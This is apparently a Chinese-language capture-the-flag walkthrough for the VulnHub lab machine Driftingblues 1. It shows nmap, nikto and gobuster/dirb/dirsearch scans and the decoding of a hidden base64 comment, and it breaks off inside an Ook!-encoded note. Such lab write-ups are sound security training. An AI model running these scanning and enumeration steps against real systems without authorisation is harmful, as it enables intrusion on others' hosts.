Driftingblues 1
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:77:22:0d 1 60 PCS Systemtechnik GmbH
192.168.56.208 08:00:27:c7:71:ac 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.208
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-14 08:47 EST
Nmap scan report for driftingblues.box (192.168.56.208)
Host is up (0.000085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cae6d11f27f26298efbfe438b5f16777 (RSA)
| 256 a8589999f681c4c2b4da44da9bf3b89b (ECDSA)
|_ 256 395b552a79edc3bff516fdbd61292ab7 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Drifting Blues Tech
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:C7:71:AC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ nikto -h http://192.168.56.208
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.208
+ Target Hostname: 192.168.56.208
+ Target Port: 80
+ Start Time: 2023-01-14 08:49:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 1e1e, size: 5b63056704628, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-01-14 08:49:37 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,sh,js,php,html
[+] Timeout: 10s
===============================================================
2023/01/14 08:50:41 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 7710]
/.html (Status: 403) [Size: 279]
/img (Status: 301) [Size: 314] [--> http://192.168.56.208/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.208/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.208/js/]
/secret.html (Status: 200) [Size: 25]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1318074 / 1323366 (99.60%)===============================================================
2023/01/14 08:52:07 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,sh,js,php,html
[+] Timeout: 10s
===============================================================
2023/01/14 08:52:34 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 313] [--> http://192.168.56.208/js/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.208/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.208/img/]
/index.html (Status: 200) [Size: 7710]
/secret.html (Status: 200) [Size: 25]
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 133161 / 373710 (35.63%)[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/besalu\t.sh": net/url: invalid control character in URL
Progress: 140756 / 373710 (37.66%)[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/14 08:52:43 [!] parse "http://192.168.56.208/error\x1f_log.html": net/url: invalid control character in URL
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 7710]
/.html (Status: 403) [Size: 279]
Progress: 366854 / 373710 (98.17%)===============================================================
2023/01/14 08:52:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ dirb http://192.168.56.208
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jan 14 08:53:37 2023
URL_BASE: http://192.168.56.208/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.208/ ----
==> DIRECTORY: http://192.168.56.208/css/
==> DIRECTORY: http://192.168.56.208/img/
+ http://192.168.56.208/index.html (CODE:200|SIZE:7710)
==> DIRECTORY: http://192.168.56.208/js/
+ http://192.168.56.208/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.208/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.208/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.208/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Jan 14 08:53:38 2023
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.txt,.sh,.js
Completing file
AdobeCQ-AEM.txt local-ports.txt
AdobeXML.fuzz.txt Logins.fuzz.txt
aem2.txt LotusNotes.fuzz.txt
Apache.fuzz.txt netware.txt
ApacheTomcat.fuzz.txt nginx.txt
apache.txt oauth-oidc-scopes.txt
api/ Oracle9i.fuzz.txt
axis.txt OracleAppServer.fuzz.txt
big.txt Oracle-EBS-wordlist.txt
burp-parameter-names.txt oracle.txt
BurpSuite-ParamMiner/ Passwords.fuzz.txt
CGI-HTTP-POST.fuzz.txt PHP.fuzz.txt
CGI-HTTP-POST-Windows.fuzz.txt proxy-conf.fuzz.txt
CGI-Microsoft.fuzz.txt Public-Source-Repo-Issues.json
CGIs.txt quickhits.txt
CGI-XPlatform.fuzz.txt raft-large-directories-lowercase.txt
CMS/ raft-large-directories.txt
coldfusion.txt raft-large-extensions-lowercase.txt
combined_directories.txt raft-large-extensions.txt
combined_words.txt raft-large-files-lowercase.txt
common-and-dutch.txt raft-large-files.txt
common-and-french.txt raft-large-words-lowercase.txt
common-and-italian.txt raft-large-words.txt
common-and-portuguese.txt raft-medium-directories-lowercase.txt
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,js,php,html,txt
[+] Timeout: 10s
===============================================================
2023/01/14 08:54:03 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htaccess.js (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/css (Status: 301) [Size: 314] [--> http://192.168.56.208/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.208/img/]
/index.html (Status: 200) [Size: 7710]
/js (Status: 301) [Size: 313] [--> http://192.168.56.208/js/]
/secret.html (Status: 200) [Size: 25]
/server-status (Status: 403) [Size: 279]
Progress: 115776 / 122862 (94.23%)===============================================================
2023/01/14 08:54:11 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/14 08:55:01 Starting gobuster in directory enumeration mode
===============================================================
/.hta.html (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.hta.js (Status: 403) [Size: 279]
/.hta.sh (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.js (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/css (Status: 301) [Size: 314] [--> http://192.168.56.208/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.208/img/]
/index.html (Status: 200) [Size: 7710]
/index.html (Status: 200) [Size: 7710]
/js (Status: 301) [Size: 313] [--> http://192.168.56.208/js/]
/secret.html (Status: 200) [Size: 25]
/server-status (Status: 403) [Size: 279]
Progress: 22293 / 28284 (78.82%)===============================================================
2023/01/14 08:55:03 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/14 08:55:22 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/img (Status: 301) [Size: 314] [--> http://192.168.56.208/img/]
/index.html (Status: 200) [Size: 7710]
/css (Status: 301) [Size: 314] [--> http://192.168.56.208/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.208/js/]
/secret.html (Status: 200) [Size: 25]
Progress: 842704 / 850254 (99.11%)===============================================================
2023/01/14 08:56:18 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ dirsearch -u http://192.168.56.208
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/192.168.56.208/_23-01-14_08-56-29.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-01-14_08-56-29.log
Target: http://192.168.56.208/
[08:56:29] Starting:
[08:56:29] 301 - 313B - /js -> http://192.168.56.208/js/
[08:56:30] 403 - 279B - /.htpasswd_test
[08:56:30] 403 - 279B - /.htaccess.bak1
[08:56:30] 403 - 279B - /.html
[08:56:30] 403 - 279B - /.htaccess.save
[08:56:30] 403 - 279B - /.htaccess.orig
[08:56:30] 403 - 279B - /.htaccess_extra
[08:56:30] 403 - 279B - /.htaccessOLD
[08:56:30] 403 - 279B - /.htaccessOLD2
[08:56:30] 403 - 279B - /.htaccess_orig
[08:56:30] 403 - 279B - /.htaccess_sc
[08:56:30] 403 - 279B - /.htaccessBAK
[08:56:30] 403 - 279B - /.htaccess.sample
[08:56:30] 403 - 279B - /.htm
[08:56:30] 403 - 279B - /.httr-oauth
[08:56:30] 403 - 279B - /.htpasswds
[08:56:30] 403 - 279B - /.ht_wsr.txt
[08:56:39] 301 - 314B - /css -> http://192.168.56.208/css/
[08:56:42] 301 - 314B - /img -> http://192.168.56.208/img/
[08:56:42] 200 - 8KB - /index.html
[08:56:43] 200 - 2KB - /js/
[08:56:49] 403 - 279B - /server-status
[08:56:49] 403 - 279B - /server-status/
Task Completed
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ curl http://192.168.56.208/secret.html
dig.. deeper.. maybe you
目录文件扫描除了扫出secret.html,其他一无所获,而该文件也没啥实际的价值。
仔细观察首页的页面源代码有一句注释:
</form>
<!-- L25vdGVmb3JraW5nZmlzaC50eHQ= -->
</div>
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' | base64 -d
/noteforkingfish.txt
差点错过这段注释,真是需要仔细再仔细呀
┌──(kali㉿kali)-[~/Vulnhub/Driftingblues1]
└─$ curl http://192.168.56.208/noteforkingfish.txt
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook. Ook? Ook. Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook! Ook! Ook? Ook! Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook? Ook. Ook! Ook. Ook. Ook? Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook! Ook! Ook! Ook. Ook? Ook. Ook? 